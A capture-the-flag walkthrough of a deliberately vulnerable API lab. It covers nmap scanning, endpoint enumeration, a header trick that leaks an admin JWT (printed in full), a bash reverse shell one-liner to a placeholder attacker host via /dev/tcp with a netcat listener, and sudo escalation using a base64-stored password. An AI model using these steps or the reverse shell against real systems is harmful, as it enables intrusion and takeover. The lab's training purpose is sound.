Vulnerable API App

Target Details

Target IP: 10.10.149.135

Service Discovery

Scan Open ports using nmap

$ sudo nmap -sS -sV -sC -Pn -A -oN nmap.txt 10.10.149.135
Nmap scan report for 10.10.149.135
Host is up (0.45s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 86:65:28:5a:90:b3:1f:8e:9c:0b:62:3a:71:4b:97:37 (RSA)
|   256 87:37:9b:9d:fc:c4:dd:bc:21:0c:d9:a2:ab:96:90:be (ECDSA)
|_  256 a2:fd:4a:10:db:5b:ce:3d:c2:2c:c0:0c:8f:be:6c:41 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.18.0 (Ubuntu)
5000/tcp open  upnp?
| fingerprint-strings:
|   GenericLines:
|     HTTP/1.1 400 Bad Request
...

...
Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 143/tcp)
HOP RTT       ADDRESS
1   354.40 ms 10.2.0.1
2   ... 3
4   447.88 ms 10.10.149.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Services Found:

Service

Port

Version

SSH

OpenSSH 8.2p1

nginx HTTP

/1.18.0

Web Service

5000

Unknown

Answer the Task questions

Content Discovery

Visit the web application in browser
Common endpoints are /api or api.domain.com,
/api worked!
We can find other endpoints by manually by crawling through the web application with burpsuite proxy running
On inspecting the html, the admin has left a message in webpage comment for the hacker!
```

```
from comment we can make conclusion that, we cannot directly sign up from the login page, we need to find api endpoint to sign up. admin has also provided hint to the endpoint for users sign up

On visiting /api/users endpoint, we get json response, providing information about other users!!

{
  "users": [
    {
      "userid": 1,
      "first_name": "Martin",
      "last_name": "Rodriguez",
      "admin": false
    },
    {
      "userid": 2,
      "first_name": "Kristen",
      "last_name": "Martin",
      "admin": false
    },
    ....
    {
      "userid": 27,
      "first_name": "Derek",
      "last_name": "Washington",
      "admin": true
    }
  ]
}

We got user details names, user Id and their role while using the application

In most of the cases, endpoint supports various http methods, let's verify it using OPTIONS method. Let's visit the same users enpoint and send the request to repeater this time, and change HTTP method from GET to POST
```
GET /api/users HTTP/1.1

# change to
OPTIONS /api/users HTTP/1.1
```
On visiting dmdhrumilmistry GitHub Profile repos, Vulnerable-API-App app.py file, we can retrieve all the endpoints from the file. The useful ones for now are listed below.
Endpoints Discovered using burpsuite

Endpoint

HTTP Methods Allowed

/api/users/

DELETE, HEAD, OPTIONS, GET

/api/users

POST, OPTIONS, HEAD, GET

Exploit Endpoints

from /api/user/<userid:int> endpoint we can get user details, from /api/users endpoint we can retrieve admin user id and try to get their account details. For my case admin id is 27.
admin id will vary

Send Burp Request to /api/user/27, we'll receive json response as

{
  "admin": true,
  "first_name": "Derek",
  "last_name": "Washington",
  "userid": 27
}

Using first question hint, we know that we need to send Hide-Info header in the HTTP request.

Burp Request

GET /api/user/27 HTTP/1.1
Hide-Info: 0

Burp Json Response

{
  "admin": true,
  "email": "admin@vuln-api-app.com",
  "first_name": "Derek",
  "last_name": "Washington",
  "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJmcmVzaCI6ZmFsc2UsImlhdCI6MTY1NzcwODY4OSwianRpIjoiYjBhNzdmODgtZjcyMS00ZjhkLTgyOGUtYWRlNzIwZjI3ODcwIiwidHlwZSI6ImFjY2VzcyIsInN1YiI6ImFkbWluQHZ1bG4tYXBpLWFwcC5jb20iLCJuYmYiOjE2NTc3MDg2ODl9.94MZ1fRrRrIdt_FFnLQdjGMWHbvA5_cSnwYfiaVl0Jw",
  "userid": 27
}

Now we've received token

We can add token in BurpSuite every request using Custom Header Extension, Refer docs for installation and usage, then add authorization token to extension.
Now, Add http://10.10.149.135:5000, and capture in scope requests only.
configure Custom Header extension to add header while using proxy using
- Project Options
- Sessions
- From Session Handling rules click on add button
- provide description
- Click on Add button from Rule Actions
- Choose Invoke Burp Extension
- Set extension handler to Add Custom Header
- Click on OK
- From Scope tab, click on Proxy checkbox to add headers while using proxy. Also set URL scope to set Suite Scope
- Click on OK
Visit HomePage http://10.10.149.135:5000

Get Target Machine Shell

Visit HomePage, with login admin auth token
From HomePage, visit Admin Controls tab, from where we can run bash commands
Using GTFObins Bash Reverse Shell get access to reverse shell
Start Netcat on attacker's machine
```
nc -nlvp 4444
```

Enter below command in command input field

bash -c 'exec bash -i &>/dev/tcp/ATTACKER_THM_IP/4444 <&1'

On Execution of command, we get a reverse shell on the attacker machine

$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [ATTACKER_THM_IP] from (UNKNOWN) [10.10.226.214] 33472
bash: cannot set terminal process group (610): Inappropriate ioctl for device
bash: no job control in this shell
vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$

Get User Flag

Read User Flag

vulnadmin@vulnapiapp:~/deployment/apps/Vulnerable-API-app$ cat $HOME/user.txt
THM{REDACTED}

Privilege Escalation

Checking if vulnadmin has sudo permissions
```
vulnadmin@vulnapiapp:~$ groups
sudo adm cdrom dip plugdev lxd
```
vulnadmin has sudo permission, but first we need to find its password to run sudo command

On Listing Files in vulnadmin home directory, we find a backup.txt file

vulnadmin@vulnapiapp:~$ ls -l
total 12
-rw-rw-r-- 1 vulnadmin vulnadmin   45 Jul 12 14:58 backup.txt
drwxrwxr-x 3 vulnadmin vulnadmin 4096 Jul 12 11:27 deployment
-rw-rw-r-- 1 vulnadmin vulnadmin   30 Jul 12 13:21 user.txt

On Reading file, it seems to be encoded in base64 format

Decode backup.txt file

vulnadmin@vulnapiapp:~$ cat backup.txt | base64 -d
{REDACTED}

It's password for vulnadmin account

To run sudo command we need to spawn terminal first, since the deployed application is running flask which is a python framework, python must be installed which can be verified using
```
vulnadmin@vulnapiapp:~$ python3 --version
Python 3.8.10
```

Get Interactive Shell

vulnadmin@vulnapiapp:~$ python3 -c 'import pty;pty.spawn("/bin/bash")'

List commands which can be run as with root privileges by vulnadmin

vulnadmin@vulnapiapp:~$ sudo su
[sudo] password for vulnadmin: {REDACTED}
root@vulnapiapp:/home/vulnadmin/#

Get Root Flag

root@vulnapiapp:~# cat /root/root.txt
cat /root/root.txt
THM{REDACTED}

We've successfully Rooted the machine!!

PreviousAgent T NextGit-Happens

Last updated 3 years ago

Was this helpful?